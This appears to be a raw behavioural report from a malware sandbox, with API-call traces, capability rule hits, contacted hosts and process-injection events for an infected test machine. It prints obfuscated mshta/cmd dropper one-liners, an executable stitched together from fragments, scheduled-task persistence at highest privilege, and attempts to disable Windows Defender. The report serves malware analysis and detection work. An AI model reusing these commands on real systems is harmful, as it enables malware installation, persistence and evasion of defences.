 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

Process32NextW

 snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0
url https://clients4.google.com/invalidation/android/request/
url http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url http://services.ukrposhta.com/postindex_new/
url http://dts.search-results.com/sr?lng=
url http://inposdom.gob.do/codigo-postal/
url http://creativecommons.org/ns
url http://www.postur.fo/
url https://qc.search.yahoo.com/search?ei=
url https://cacert.omniroot.com/baltimoreroot.crt09
url https://codereview.chromium.org/25305002).
url https://search.yahoo.com/search?ei=
url http://t1.symcb.com/ThawtePCA.crl0/
url http://crbug.com/31395.
url https://support.google.com/chrome/answer/165139
url https://ct.googleapis.com/aviator/
url https://datasaver.googleapis.com/v1/clientConfigs
url http://crl.starfieldtech.com/sfroot-g2.crl0L
url https://ct.startssl.com/
url https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url https://de.search.yahoo.com/favicon.ico
url https://github.com/GoogleChrome/Lighthouse/issues
url http://www.searchnu.com/favicon.ico
url https://support.google.com/installer/?product=
url http://msdn.microsoft.com/en-us/library/ms792901.aspx
url https://www.najdi.si/search.jsp?q=
url http://x.ss2.us/x.cer0
url http://crl.geotrust.com/crls/gtglobal.crl04
url https://accounts.google.com/ServiceLogin
url https://accounts.google.com/OAuthLogin
url https://c.android.clients.google.com/
url https://search.goo.ne.jp/sgt.jsp?MT=
url https://www.google.com/tools/feedback/chrome/__submit
url https://chrome.google.com/webstore/category/collection/dark_themes
url http://check.googlezip.net/generate_204
url http://ocsp.starfieldtech.com/08
url http://www.guernseypost.com/postcode_finder/
url http://crl.certum.pl/ca.crl0h
url http://ator
url https://suggest.yandex.by/suggest-ff.cgi?part=
url http://feed.snap.do/?q=
url https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url http://www.language
url https://support.google.com/chrome/
url http://developer.chrome.com/apps/declare_permissions.html
url https://ct.googleapis.com/rocketeer/
url https://www.globalsign.com/repository/03
url http://www.startssl.com/sfsca.crl0
url http://UA-Compatible
url https://se.search.yahoo.com/search?ei=
url http://EVSecure-ocsp.geotrust.com0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000004c0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000004c0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000004d8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
2 0

RegOpenKeyExA

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
2 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000001
process_identifier: 2744
process_handle: 0x00000184
0 0

NtTerminateProcess

 status_code: 0x00000001
process_identifier: 2744
process_handle: 0x00000184
1 0 0

NtTerminateProcess

 status_code: 0xc0000005
process_identifier: 3104
process_handle: 0x0000000000000094
0 0

NtTerminateProcess

 status_code: 0xc0000005
process_identifier: 3104
process_handle: 0x0000000000000094
1 0 0
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline taskkill /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline MSHTa.Exe vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
host 186.2.171.3
host 194.145.227.159
host 2.56.59.42
host 37.0.8.119
host 45.133.1.107
host 45.133.1.182
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 656
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000088
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x00000304
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 656
process_handle: 0x00000088
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
process mega.bmp useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process u7bmZ_Jch5QWYEh3mRgkn8v4.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
process xmi8r9WNNrVSGcFZGMShRqy0.exe useragent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
process Gul5rTCKpjXo0MogByz6Rjtk.tmp useragent InnoDownloadPlugin/1.5
Process injection Process 1908 called NtSetContextThread to modify thread in remote process 656
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4199584
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000084
process_identifier: 656
1 0 0
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3100 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef2f6f1e8,0x7fef2f6f1f8,0x7fef2f6f208
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1176,17672995794706782013,1541734518934870182,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=73BCB26540B40F2EE1EA92702426D5DA --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2
url http://127.0.0.1
Process injection Process 1908 resumed a thread in remote process 656
Process injection Process 3016 resumed a thread in remote process 1032
Process injection Process 2532 resumed a thread in remote process 2432
Process injection Process 3276 resumed a thread in remote process 3104
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 1
process_identifier: 656
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1032
1 0 0

NtResumeThread

 thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 2432
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000108
suspend_count: 1
process_identifier: 1108
1 0 0

CreateProcessInternalW

 thread_identifier: 2364
thread_handle: 0x00000624
process_identifier: 1892
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
track: 1
command_line: "C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe"
filepath_r: C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000628
1 1 0

CreateProcessInternalW

 thread_identifier: 2044
thread_handle: 0x00000568
process_identifier: 1976
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000570
1 1 0

CreateProcessInternalW

 thread_identifier: 2532
thread_handle: 0x00000568
process_identifier: 2664
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000570
1 1 0

NtResumeThread

 thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 1892
1 0 0

CreateProcessInternalW

 thread_identifier: 2984
thread_handle: 0x00000634
process_identifier: 2644
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
stack_pivoted: 0
